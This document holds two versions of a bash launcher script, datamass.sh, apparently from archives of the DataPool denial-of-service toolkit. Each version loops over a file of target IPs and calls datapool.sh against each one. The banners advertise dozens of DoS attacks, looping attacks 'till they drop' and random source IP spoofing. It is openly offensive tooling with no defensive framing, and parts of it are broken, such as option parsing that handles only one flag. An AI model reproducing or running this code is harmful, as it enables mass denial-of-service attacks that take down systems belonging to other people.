==> datapool2.0.tar.gz: datapool/datamass.sh <==
#!/bin/bash
if [ ! -f ./ips.txt ]; then
echo "Please create ./ips.txt with a list of IPs to attack before running."
exit 1
fi
function usage {
echo "Usage: $0 [-d] [destination ip] [-i] [source ip] [-v] [logfile]"
echo " [-p] [portlow-porthigh] [-s] [-l] [T1|T3|Modem] [-x] [-k] [-a]"
echo "Options:"
echo "[-d]: Specifies destination IP: REQUIRED"
echo "[-p]: Specifies port range to scan.  ex: -p 1-1024"
echo "[-x]: \"Don't stop till they drop\""
echo "[-v]: Logs results of scan to file.  ex: -v logfile.log"
echo "[-s]: Scan ports only."
echo "[-l]: Specifies line speed.  Choose from T1,T3, and Modem."
echo "[-i]: Specifies source IP.  ex: -i 127.0.0.1"
echo "[-k]: Wait till host is online, then attack."
echo "[-a]: Loop attack. (Used with -k and -x can keep a connection dropped.)"
exit 1
}
LOOPATK=0
while getopts p:v:d:l:i:xask OPTION ; do
    case "$OPTION" in
    a) LOOPATK=1 ;;
   \?) usage ;;
   esac
   
done
clear
echo "__________  ___  ____________________________________________________"
echo "|___|____| (   ) _|____|______|______|______|_____|______|_____|_____"
echo "__|____|__ |   |  ___|____|______|______|_______|____|______|_______|"
echo "____|____| |   | _|____|_____|______|______|_______|_____|______|____"
echo "_|_____|__ |   | _________  __|__        ::[DataPool v2.0]::   ___|__"
echo "___  ______)   |/         \ _____ Features:                    _|____"
echo "_|_ /          |  P O_O L | __|__ *  72 DoS attacks            ___|__"
echo "___ |    _     |    / \   | _____ *  Line speed option         _|____"
echo "_|_ |   / \    |    \_/   | __|__ *  Looping attack option     ___|__"
echo "___ |   \_/    |          | _____ *  Logging option            _|____"
echo "_|_ | D A T A  |    ______/ __|__ *  Connection watching       ___|__"
echo "___ \_________/|   ( ____________ *  Multiple IP attacks       _|____"
echo "__|___________ |   | _|____|____|_________________________________|__"
echo "_|____|____|__ |   | ____|____|_____|_____|______|______|_____|_____|"
echo "____|____|____ |   | _|____|____|_____|______|______|_____|______|___"
echo "_|____|____|__ (___) ____|____|_____|______|______|_____|_____|_____|"	
if [ "$LOOPATK" = "0" ]; then
CCLASS=`cat ./ips.txt -n | grep 1 -w | cut -b8-`
IPNUM=`cat ./ips.txt | wc -l`
echo "Beginning attack..."
c1=1
while [ $c1 -le $IPNUM ]
do
ATTACKIP=`cat ./ips.txt -n | grep $c1 -w | cut -b8-`
echo "Attacking $ATTACKIP..."
./datapool.sh $@ -d $ATTACKIP 1>/dev/null 2>/dev/null
case $? in
0)
echo "$ATTACKIP was dropped by $LASTATTACK"
;;
1)
echo "There was an error running the script...exiting."
exit 1
;;
2)
echo "$ATTACKIP was not avaliable."
;;
3)
echo "$ATTACKIP had no ports open."
;;
4)
echo "The following ports are open on $ATTACKIP:"
cat ./output2.txt
;;
5)
echo "$ATTACKIP was attacked, but is still alive..."
;;
esac
c1=`expr $c1 + 1`
done
echo "Attack completed."
else
while true; do
CCLASS=`cat ./ips.txt -n | grep 1 -w | cut -b8-`
IPNUM=`cat ./ips.txt | wc -l`
echo "Beginning attack..."
c1=1
while [ $c1 -le $IPNUM ]
do
ATTACKIP=`cat ./ips.txt -n | grep $c1 -w | cut -b8-`
echo "Attacking $ATTACKIP..."
./datapool.sh $@ -d $ATTACKIP 1>/dev/null 2>/dev/null
if [ $? -eq 0 ]; then
echo "Attack on $ATTACKIP completed"
else
echo "Attack on $ATTACKIP failed."
fi
c1=`expr $c1 + 1`
done
echo "Attack completed."
done
fi

==> datapool2.1.tar.gz: datapool/datamass.sh <==
#!/bin/bash
if [ ! -f ./ips.txt ]; then
echo "Please create ./ips.txt with a list of IPs to attack before running."
exit 1
fi
function usage {
echo "Usage: $0 [-d] [destination ip] [-i] [source ip] [-v] [logfile]"
echo " [-p] [portlow-porthigh] [-s] [-l] [T1|T3|Modem] [-x] [-k] [-a]"
echo "Options:"
echo "[-d]: Specifies destination IP: REQUIRED"
echo "[-p]: Specifies port range to scan.  ex: -p 1-1024"
echo "[-x]: \"Don't stop till they drop\""
echo "[-v]: Logs results of scan to file.  ex: -v logfile.log"
echo "[-s]: Scan ports only."
echo "[-l]: Specifies line speed.  Choose from T1,T3, and Modem."
echo "[-i]: Specifies source IP.  ex: -i 127.0.0.1"
echo "[-k]: Wait till host is online, then attack."
echo "[-a]: Loop attack. (Used with -k and -x can keep a connection dropped.)"
exit 1
}
LOOPATK=0
while getopts p:v:d:l:i:xask OPTION ; do
    case "$OPTION" in
    a) LOOPATK=1 ;;
   \?) usage ;;
   esac
   
done
clear
echo "          d8b           d8b                                       d8b"
echo "          888         \"88888\"                                     888"
echo "     e88~-888  e88~-888 888  e88~-888 d88-~88e   e88~-e   e88~-e  888"
echo "    d88D  888 d888  888 888 d888  888 888  P88b d888  8b d888  8b 888"
echo "    888A  888 8888  888 888 8888  888 888  O888 8888  88 8888  88 888" 
echo "    888T  888 Y888  888 888 Y888  888 888  O88P Y888  8P Y888  8P 888"
echo "     \"8A_-888  \"88_-888 \"8\"  \"88_-888 888-_L8\"   \"88_-\"   \"88_-\"  \"8\""
echo "                                      888                            "
echo "    \"\"\"\"\"Y888888888888888888888888888 \"8\" 88888888beeeeeeeeeeee      "
echo " Version 2.1      \"\"\"\"\"\"\"Y888888888888eee888888888888888888888888ee  "
echo " * Multiple IP attacks      \"\"\"\"\"\"\"\"Y888888888888888888888888888P    "
echo " * Connection Watching                     \"\"\"\"\"\"\"Y888888888P        "
echo " * Looping attacks * \"Don't stop till they drop\"    \"\"\"\"\"\"           "
echo " * 82 DoS attacks * Line speed option * Portless attacks             "
echo " * Port range specification * Random source IP generation            "
if [ "$LOOPATK" = "0" ]; then
CCLASS=`cat ./ips.txt -n | grep 1 -w | cut -b8-`
IPNUM=`cat ./ips.txt | wc -l`
echo "Beginning attack..."
c1=1
while [ $c1 -le $IPNUM ]
do
ATTACKIP=`cat ./ips.txt -n | grep $c1 -w | cut -b8-`
echo "Attacking $ATTACKIP..."
./datapool.sh $@ -d $ATTACKIP 1>/dev/null 2>/dev/null
case $? in
0)
echo "$ATTACKIP was dropped by $LASTATTACK"
;;
1)
echo "There was an error running the script...exiting."
exit 1
;;
2)
echo "$ATTACKIP was not avaliable."
;;
4)
echo "The following ports are open on $ATTACKIP:"
cat ./output2.txt
;;
5)
echo "$ATTACKIP was attacked, but is still alive..."
;;
esac
c1=`expr $c1 + 1`
done
echo "Attack completed."
else
while true; do
CCLASS=`cat ./ips.txt -n | grep 1 -w | cut -b8-`
IPNUM=`cat ./ips.txt | wc -l`
echo "Beginning attack..."
c1=1
while [ $c1 -le $IPNUM ]
do
ATTACKIP=`cat ./ips.txt -n | grep $c1 -w | cut -b8-`
echo "Attacking $ATTACKIP..."
./datapool.sh $@ -d $ATTACKIP 1>/dev/null 2>/dev/null
if [ $? -eq 0 ]; then
echo "Attack on $ATTACKIP completed"
else
echo "Attack on $ATTACKIP failed."
fi
c1=`expr $c1 + 1`
done
echo "Attack completed."
done
fi
